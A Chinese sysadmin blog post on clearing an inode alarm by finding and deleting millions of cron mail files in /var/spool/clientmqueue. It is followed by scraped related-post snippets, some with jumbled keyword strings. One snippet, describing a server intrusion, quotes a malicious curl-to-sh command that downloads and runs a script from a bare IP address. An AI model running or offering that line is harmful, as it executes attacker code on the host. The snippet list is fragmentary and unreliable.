記一次伺服器inodes數報警的事件
1 # df -i
執行以上命令,發現/上的 inodes 佔用率為81%,於是開始處理。
首先找出哪個目錄底下檔案數最多:
1 # cd / 2 # for i in $(ls);do echo ${i} && find ${i} | wc -l;done
我找出的目錄是/var/spool/clientmqueue目錄,檔案數有200萬左右。之
所有有這麼多,是因為定時任務的原因。如果某個定時任務執行時有輸出內容,
這些輸出內容會以郵件的形式發往crontab的使用者,慢慢的就佔滿了空間。
解決辦法:在定時任務命令後重定向到空裝置中去。
> /dev/null 2>&1
找到之後,就開始刪除那200萬檔案。
1 # cd /var/spool/clientmqueue 2 3 # ls | xargs rm -f
最終inodes佔用率降為40%。
相關推薦
記一次伺服器inodes數報警的事件
1 # df -i 執行以上命令,發現/上的 inodes 佔用率為81%,於是開始處理。 首先找出哪個目錄底下檔案數最多: 1 # cd / 2 # for i in $(ls);do echo ${i} && find ${i} | wc -l;done
記一次socket_create()函數耗時異常記錄
des inpu 100% 可能 應用程序 解釋 一次 urn 異常 背景: 下午開發時突然整個頁面耗時增加,空接口每次都需要2-3秒的耗時,一開始以為連開發環境數據庫出現問題,最後斷開數據庫跑,發現還是很慢 最終逐步調試此頁面耗時,定位到了socket_c
記一次HDFS的block corrupt事件
查找 保存 需要 一次 ilo maps 易懂 data edit 還有最後兩天班,明天晚上回家過年了,可是CDH突然報了一個block missing的錯誤,用 hdfs fsck /檢查了一下,我們的塊一共有500W個,missing了將近100W個,天
記一次線上MySQL數據庫死鎖問題
重復 成功 中一 主鍵 adl 一次 his TE BE 最近線上項目報了一個MySQL死鎖(DealLock)錯誤,雖說對業務上是沒有什麽影響的,由於自己對數據庫鎖這塊了解不是很多,之前也沒怎麽的在線上碰到過。這次剛好遇到了,便在此記錄一下。 出現
記一次服務器被攻擊事件
不用 時間 edi 能夠 hist 幹凈 col nbsp ssh key 病毒清除 事情都解決了好多天,今天來總結一下,那天開發問數據備份沒有沒有拉到他們的那臺服務器上,於是乎就去看了一下為什麽定時任務沒有執行,看了之後,waht???我的定時任務全部沒了,NND 定時任
記一次HTTP/TCP數據報的探究
放置 多個 proc 優先 等等 space cer 部分 sha 探究背景:我們經常說TCP是傳輸層協議,IP是網絡層協議,HTTP協議是應用層協議等等,那麽究竟他們三者是如何融洽的工作在一起的呢?我們今天主要來實驗探究一下TCP和HTTP到底是怎麽結合的。實驗環境:
記一次伺服器掛掉,cpu佔用過大的問題
凌晨一點電話:咚咚咚 喂:伺服器掛掉了,你查檢視問題,然後處理下。 我:好的。 從日誌看幾乎所有的logic日誌全都掛掉,不再列印日誌,然後logic程序僵死,佔用cpu百分90多,有些可怕。 第一反應是邏輯迴圈問題。 因為是公司自己的框架採用lua編寫。
記一次伺服器Tomcat優化經歷
公司需要一臺測試伺服器來做測試用,所以花了點時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,執行 ./catalina.sh run命令,在前臺列印執行資訊,首先看其有沒有報錯。好,沒有報錯,進行下一步。 1)修改你的jdk目錄下/
記一次伺服器被爆破 防護歷程
在騰訊雲搞了一個雲主機, 安裝了寶塔的服務, 第三天登陸 後臺發現有兩個ip在爆破root 密碼, 雖然對自己的密碼強度比較自信, 但是被人惦記也是很難受。決定做點什麼 。。。。 直接進入正題: 1. 最基本的建議就是:平時登陸和工作的時候都使用普通使用者進行操作 直接禁用root
記一次伺服器擴盤
問題:測試伺服器突然zk掛了,重新啟動後根本起不了,發現報錯: 查詢後發現根分割槽爆滿: 解決問題: 一、在虛擬機器上增加新盤 1、增加盤後將盤分割槽 [[email protected] ~]# fdisk /dev/sda Welcome to fdis
記一次線上檔案數開啟過多的問題
問題 線上服務忽然宕機,導致應用全部異常退出拒絕服務,運維同學反饋線上app無法登入了。 查詢原因 直覺告訴我,又是資料庫掛了(之前有過先例),已經做好了最壞的打算,準備去kill process了,開啟阿里雲後臺,結果發現數據庫一切正常。 然後去看應用服務的監
記一次伺服器被黑經歷
從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更改
記一次伺服器被攻擊經歷
從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更
記一次伺服器CPU異常處理流程
上線新版本後cpu飆升,配置什麼都沒變! 1,著手調查馬上檢視慢查詢,沒有慢查詢 2,檢視慢php程序tail -f log.slow,定位到方法函式圖片轉指令方法耗時大,和cpu損耗掛鉤,基本猜測這個函式方法,但沒有優化空間 3,不死心,查一下程序耗損掛起點:ll /proc/PID號/f
記一次後臺被入侵的事件及反思
前幾天後臺被入侵,造成伺服器癱瘓數個小時,雖然資料都沒有丟失,但是也著實嚇出一身汗,下面還原整個事件 晚上10點左右,有人反應進不去app了,我還以為是玩笑,結果是伺服器檔案被刪除了,趕緊停服務檢視,c
記一次React中非同步獲取事件物件的爬坑經歷
SyntheticEvent objects are pooled 在使用React過程中,直接非同步獲取事件物件上的屬性,實際上我們拿到的值永遠是null,下面的程式碼就存在問題 const handleClick = e => { setTimeout(() => {
記一次伺服器上配置GPU版本tensorflow的經歷
早就耳聞tensorflow-gpu與CUDA,cudnn三者之間版本匹配很複雜,今天算是見識到了。 首先看了下伺服器上的CUDA、cudnn版本,分別是CUDA8.0,cudnn7.0.4 這個匹配很奇怪,一般都是CUDA8 + cudnn6或者 CUDA9 + cudnn7 後來知
記一次阿里雲黑客攻擊事件
這幾天伺服器一直髮生異常行為,阿里雲報警如下:根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個程序一直從這個美國的IP地址下載sh可執行檔案訪問這個地址:http://165
記一次伺服器被挖礦程式佔用的解決過程
公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被**
記一次奇葩的Js劫持事件
最近,專案突發狀況,之前開發的一個手機端APP內嵌H5頁面突然異常。現象是重新整理頁面後,有很大概率頁面卡死在資料載入階段。於是聯絡App開發人員,出調試包。開始除錯。 開始除錯後,首先發現頁面載入時傳送了一個奇怪的請求-http://8.525cm.com/v2/v.ph